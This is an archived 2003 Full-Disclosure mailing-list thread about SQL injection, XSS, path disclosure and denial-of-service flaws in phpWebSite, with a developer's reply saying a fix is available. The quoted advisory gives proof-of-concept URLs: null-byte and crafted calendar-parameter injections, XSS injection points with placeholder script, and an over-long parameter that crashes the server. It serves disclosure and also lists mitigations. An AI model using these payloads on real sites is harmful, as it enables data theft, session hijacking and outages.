[<prev] [next>] [<thread-prev] [day] [month] [year] [list]
Message-ID: <47798.152.10.115.146.1060635666.squirrel@tux.appstate.edu>
From: dg49379 at tux.appstate.edu (Darren Greene)
Subject: phpWebSite SQL Injection & DoS & XSS
Vulnerabilities
The fix posted on phpwebsite.appstate.edu fixes both XSS and SQL injections.
Darren
> Hi Jack,
> i was contacted by the phpWebSite team for release the fix.
> The fix is only for prevent the XSS attacks , theu are working now in
> fixes for the SQL Injections.
>
> best regards,
>
>> There is a fix for this available at phpWebSite's page (posted a
> short time
>> ago):
>> http://phpwebsite.appstate.edu/
>>
>> -Jack Whitsitt
>>
>>
>> ----- Original Message -----
>> From: "Lorenzo Hernandez Garcia-Hierro" <novappc@...appc.com>
>> To: <full-disclosure@...ts.netsys.com>
>> Sent: Sunday, August 10, 2003 6:15 PM
>> Subject: [Full-Disclosure] phpWebSite SQL Injection & DoS & XSS
>> Vulnerabilities
>>
>>
>> >
>> > phpWebSite SQL Injection & DoS & XSS Vulnerabilities
>> > ------
>> > PRODUCT: phpWebSite
>> > VENDOR: Appalachian State University
>> > VULNERABLE VERSIONS:
>> >
>> > - 0.9.x
>> > - 0.8.x
>> > - 0.7.x
>> > - And older versions.
>> >
>> > NO VULNERABLE VERSIONS
>> >
>> > - ?
>> > ---------------------
>> >
>> > Description:
>> >
>> > phpWebSite provides a complete web site content management system.
> Web-
>> > based administration allows for easy maintenance of interactive,
>> > community-driven web sites.
>> >
>> > ---------------------------------------------
>> > |SECURITY HOLES FOUND and PROOFS OF CONCEPT:|
>> > ---------------------------------------------
>> >
>> > I encountered SQL Injection vulnerabilities in some of the
> phpWebSite
>> > modules , XSS ( Cross Site Scripting ) , Path Disclosures and a
> Denial
>> > of Service attack.
>> >
>> > -------------
>> > | SQL |
>> > | INJECTION |
>> > -------------
>> >
>> > I encountered SQL Injection vulnerabilities in the Calendar module ,
>> > active in default configurations , that allows you
>> > to execute SQL queries in the target server with the privileges of
> the
>> > application user.
>> >
>> > When you send a special-crafted command url to the Calendar script
> you
>> > get a SQL error flag like this:
>> > __________________________________________________________________
>> > DB Error: syntax error
>> > select * from mod_calendar_events where ((startDate >= 2003\0
> [CRAFTED
>> > VALUE]0110 and startDate <= 2003\0[CRAFTED VALUE]0110) or
>> > (endDate >= 2003\0[CRAFTED VALUE]0110 and endDate <= 2003\0[CRAFTED
>> > VALUE]0110)) and active=1 [nativecode=1064
>> > ** You have an error in your SQL syntax near
>> > '\0[CRAFTED VALUE]0110 and startDate <= 2003\0[CRAFTED VALUE]0110)
> or
>> > (endDate >= 2003\0[CRAFTED VALUE]0110 and endDate ' at line 1]
>> > ___________________________________________________________________
>> >
>> > This is an example error flag:
>> > ___________________________________________________________________
>> > DB Error: syntax error
>> > select * from mod_calendar_events where ((startDate >= 2003\0-10110
> and
>> > startDate <= 2003\0-10110) or
>> > (endDate >= 2003\0-10110 and endDate <= 2003\0-10110)) and active=1
>> > [nativecode=1064
>> > ** You have an error in your SQL syntax near
>> > '\0-10110 and startDate <= 2003\0-10110) or (endDate >= 2003\0-10110
>> > and endDate ' at line 1]
>> > ___________________________________________________________________
>> >
>> > For get this you must use this simple url:
>> >
>> > http://[HOST]/[PATH]/index.php?module=calendar&calendar[view]
>> > =day&year=2003%00-1&month=
>> >
>> > And you get the SQL Error flag. The error occurs when the query
>> > includes the crafted value 2003[%00 = null]-1 .
>> > You can design a successful query for get configuration values or
>> > authentication data.
>> > I desgined an url that makes a successful query ( no hostile
> query ) :
>> >
>> > http://[HOST]/[PATH]/index.php?module=calendar&calendar[view]
>> > =month&month=11&year=2003%20and%20startDate%20%3c%3d%2020071205%29%
> 20or%
>> > 20%28%20endDate%20%3e%3d031101%20and%20endDate%20%3c%3d%2020071205%
> 29%
>> > 29%20and%20active%3d1
>> >
>> > it is ( without url encoding ) :
>> >
>> > 2003 and startDate <= 20071205) or ( endDate >=031101 and endDate <=
>> > 20071205)) and active=1
>> >
>> > It is needed to have a little knowledge of SQL ( in this case ,
> MySQL )
>> > for make a successful attack.
>> >
>> > Other scripts of the Calendar module are affected by this hole ,
> when
>> > you send a crafted request like a + symbol at critical url variable
>> > value
>> > you get the "pure" sql server error flag and you can imagine ( i
> like
>> > this word ) a sql query for view private information of the
> application
>> > by
>> > looking at the error pages , like an try-error method.
>> >
>> > Another urls for probe are:
>> >
>> > http://[HOST]/[PATH]/index.php?module=calendar&calendar[view]
>> > =day&month=0&year=<
>> >
>> > http://[HOST]/[PATH]/index.php?module=calendar&calendar[view]
>> > =day&month=1%00&year=)SQL_INJECTION_FAKU
>> >
>> > ------------------
>> > | XSS |
>> > | vulnerabilities|
>> > ------------------
>> >
>> > I encountered XSS security holes in some scripts of phpWebSite :
>> >
>> >
>> > http://[HOST]/[PATH]/index.php?module=calendar&calendar[view]
>> > =day&month=2&year=2003&day=1+%00">[XSS ATTACK CODE]
>> >
>> > http://[HOST]/[PATH]/index.php?module=fatcat&fatcat[user]
>> > =viewCategory&fatcat_id=1%00+">[XSS ATTACK CODE]
>> >
>> > http://[HOST]/[PATH]/index.php?
>> > module=pagemaster&PAGE_user_op=view_page&PAGE_id=10">[XSS ATTACK
> CODE]
>> > &MMN_position=[X:X]
>> >
>> > http://[HOST]/[PATH]/index.php?
>> > module=search&SEA_search_op=continue&PDA_limit=10">[XSS ATTACK CODE]
>> >
>> >
>> > Note that the Calendar & PageMaster & Fatcat modules are affected
>> > COMPLETLY and all the script variables that are passed by url are
>> > affected too by this.
>> >
>> > When you access a hostile link with a xss attack in those scripts
> youur
>> > browser will execute the script commands.
>> > This can be use for steal cookies , authentication tokens and other
>> > private information.
>> > If your browser is vulnerable to other holes ( like MSIE ;-) you can
>> > have more problems...
>> >
>> > XSS AT SQL ERRORS:
>> >
>> > If you send a crafted url command with a XSS attack code to some of
> the
>> > scripts that are vulnerable against sql injection vulnerabilities ,
> the
>> > xss attack code will be executed
>> > in the error page.
>> >
>> >
>> > -----------------
>> > | PATH |
>> > | DISCLOSURES |
>> > -----------------
>> >
>> > I tested this in a Win2K ( Windows 2000 Professional ) with SP3 and
>> > versions:
>> >
>> > - Sambar Server 5.2 beta
>> > - PHP 4.2.3 running as ISPAI module
>> > - MySQL NT [normal service] 3.23.56
>> > - Include_Path to the pear folder of phpwebsite
>> >
>> > Sending this:
>> >
>> > http://127.0.0.1/index.php?module=calendar&calendar[view]
>> > =month&month=11&year=9 # You can try other things and get the same #
>> >
>> > you get this:
>> >
>> > Warning: localtime(): invalid local time in
>> > C:\ws\phpws\lib\pear\Date\TimeZone.php on line 252
>> >
>> > Warning: localtime(): invalid local time in
>> > C:\ws\phpws\lib\pear\Date\TimeZone.php on line 252
>> >
>> > <- more than fifty repetitions of this warning ->
>> >
>> > It is a strange error , i think that it only occurs in MSWindows
>> > installations.
>> > Possible it occurs when the Pear library TimeZone.php script tries
> to
>> > convert the localdate in unix time stamp format.
>> >
>> > ------------------
>> > | DENIAL OF |
>> > | SERVICE |
>> > ------------------
>> >
>> > There is a DoS/Buffer Overflow Attack in a script inside the
> Calendar
>> > module that allows you to crash the host running
>> > the MySQL server and the phpWebSite scripts ( must be the same
>> > computer ).
>> >
>> > This is a basic proof of concept for this vulnerability :
>> >
>> > http://[HOST]/[PATH]/index.php?index.php?module=calendar&calendar
> [view]=
>> > [VIEW FORM]&month=11&year=91+92+93...( more than 4000 bytes )
>> >
>> > An attack like this causes a system global crash including the
> server
>> > service and the mysql service.
>> >
>> > -----------------
>> > | SoLuTiOnS |
>> > -----------------
>> >
>> > 1.- Be sure that the user of the phpWebSite database has only
> SELECT ,
>> > INSERT and UPDATE privileges in only the phpWebSite
>> > database.
>> >
>> > 2.- Use the php function eregi_replace for prevent XSS attacks.
>> >
>> > 3.- Turn php_error_flags to Off .
>> >
>> > 4.- Use in addition an external module if you are using apache like
>> > mod_security .
>> >
>> > 5.- If you are paranoic don't use PHP , MySQL , Windows , Linux ,
>> > computers , tcp/ip , netbios , games , asp ,
>> > Apache...... nothing !
>> > WARNING ;-) : ( paranoic solution... )
>> >
>> > -----------
>> > | CONTACT |
>> > -----------
>> >
>> > Lorenzo Hernandez Garcia-Hierro
>> > --- Computer Security Analyzer ---
>> > --Nova Projects Professional Coding--
>> > PGP: Keyfingerprint
>> > B6D7 5FCC 78B4 97C1 4010 56BC 0E5F 2AB2
>> > ID: 0x9C38E1D7
>> > **********************************
>> > www.novappc.com
>> > security.novappc.com
>> > www.lorenzohgh.com
>> > ______________________
>> >
>> > NSRG-20-7
>> > _______________________________________________
>> > Full-Disclosure - We believe in it.
>> > Charter: http://lists.netsys.com/full-disclosure-charter.html
>> >
>>
>>
>
>
> _______________________________________________
> Full-Disclosure - We believe in it.
> Charter: http://lists.netsys.com/full-disclosure-charter.html
>
Powered by blists - more mailing lists